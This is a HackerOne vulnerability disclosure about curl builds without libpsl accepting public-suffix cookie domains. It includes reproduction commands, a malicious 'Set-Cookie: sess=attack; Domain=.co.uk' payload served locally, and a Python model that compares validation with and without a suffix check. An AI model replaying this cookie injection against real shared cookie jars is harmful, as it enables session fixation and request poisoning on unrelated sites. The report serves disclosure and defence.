HACKERONE

curl: Public-suffix cookie injection when libpsl is disabled

Description

Summary:
When libcurl is built without libpsl, Domain attribute validation accepts public suffixes like .co.uk, allowing a malicious host to plant cookies that are later sent to unrelated sibling domains using the same cookie jar. AI assistance was used to draft this report.

Steps to Reproduce:
1) Build curl without libpsl (e.g., `./configure --disable-shared --without-libpsl && make -j`; confirm `curl --version` lists no PSL feature).
2) Run a local HTTP server that sets `Set-Cookie: sess=attack; Domain=.co.uk; Path=/` when the Host header starts with attacker.co.uk (example: `/tmp/curl/cookie_server.py 8000 <logpath>`).
3) Store cookies: `/tmp/curl/src/curl -v --resolve attacker.co.uk:8000:127.0.0.1 http://attacker.co.uk:8000/ -c /tmp/cjar2`.
4) Reuse the cookie jar on a different host: `/tmp/curl/src/curl -v --resolve victim.co.uk:8000:127.0.0.1 http://victim.co.uk:8000/ -b /tmp/cjar2`.
5) Observe `Cookie: sess=attack` sent to victim.co.uk and `.co.uk` stored in the jar (see `artifacts/cookie_server.log` and `artifacts/cookie_jar_public_suffix.txt`).

Impact:
A malicious server can inject cookies scoped to public suffixes and have them sent to unrelated domains, enabling session fixation or request poisoning in applications that reuse a shared cookie jar across multiple domains.
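To make the validation gap concrete, the following is an added example (not curl's or libcurl's code) that models the Domain-attribute check libpsl provides and replays the report's scenario against a toy cookie jar with the public-suffix check switched on and off. The suffix set is a constructed, deliberately tiny stand-in for the real Public Suffix List; a real client loads the full list.

```python
"""Cookie Domain-attribute validation with and without a public-suffix check.

Added example modelled on the behaviour the report describes; not code from
curl or libcurl. PUBLIC_SUFFIXES is a constructed subset of the Public Suffix
List (assumption: a real client loads the full list, e.g. through libpsl).
"""

# Rules are stored lowercase without a leading dot.
PUBLIC_SUFFIXES = {"com", "uk", "co.uk", "org.uk", "github.io"}


def is_public_suffix(domain):
    """True if `domain` is exactly a public suffix (eTLD)."""
    return domain.lower().strip(".") in PUBLIC_SUFFIXES


def domain_matches(host, cookie_domain):
    """RFC 6265 section 5.1.3 domain-match: equal, or host is a subdomain."""
    host, cookie_domain = host.lower(), cookie_domain.lower()
    return host == cookie_domain or host.endswith("." + cookie_domain)


def validate_cookie_domain(request_host, domain_attr, psl_enabled=True):
    """Return the effective cookie domain, or None if the cookie must be dropped.

    With psl_enabled=False this reproduces the permissive behaviour of a build
    without libpsl: any Domain that the request host falls under is accepted,
    including a bare public suffix such as co.uk.
    """
    if not domain_attr:
        return request_host.lower()  # no Domain attribute: host-only cookie
    d = domain_attr.lower().strip(".")
    if not d or not domain_matches(request_host, d):
        return None  # malformed, or the request host is not within Domain
    if psl_enabled and is_public_suffix(d):
        return None  # would be shared with every registrable domain under it
    return d


def store_cookie(jar, request_host, set_cookie_header, psl_enabled=True):
    """Parse one Set-Cookie header and add it to `jar` if validation passes."""
    parts = [p.strip() for p in set_cookie_header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.lower()] = val
    domain = validate_cookie_domain(request_host, attrs.get("domain", ""), psl_enabled)
    if domain is None:
        return False
    jar.append({
        "name": name,
        "value": value,
        "domain": domain,
        "host_only": not attrs.get("domain"),
        "path": attrs.get("path", "/"),
    })
    return True


def cookies_for(jar, request_host):
    """Names of the cookies the jar would send to request_host (Path ignored)."""
    sent = []
    for c in jar:
        if c["host_only"]:
            if request_host.lower() == c["domain"]:
                sent.append(c["name"])
        elif domain_matches(request_host, c["domain"]):
            sent.append(c["name"])
    return sent


def replay_report(psl_enabled):
    """Replay the report: attacker.co.uk sets Domain=.co.uk, victim.co.uk reuses the jar.

    Returns (cookie_was_stored, cookie_names_sent_to_victim).
    """
    jar = []
    stored = store_cookie(jar, "attacker.co.uk",
                          "sess=attack; Domain=.co.uk; Path=/", psl_enabled)
    return stored, cookies_for(jar, "victim.co.uk")


if __name__ == "__main__":
    for enabled in (False, True):
        stored, sent = replay_report(enabled)
        print(f"psl_enabled={enabled}: stored={stored}, sent to victim.co.uk={sent}")
```

Without the suffix check the `.co.uk` cookie is stored and replayed to `victim.co.uk`; with it the Set-Cookie is rejected at storage time, which is the point at which a PSL-aware client stops the cross-site leak. A narrower Domain such as `.attacker.co.uk` passes in both modes, so legitimate subdomain cookies are unaffected.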


Basic Information

ID H1:3475472
Published Dec 22, 2025 at 16:34
Modified Dec 25, 2025 at 16:54
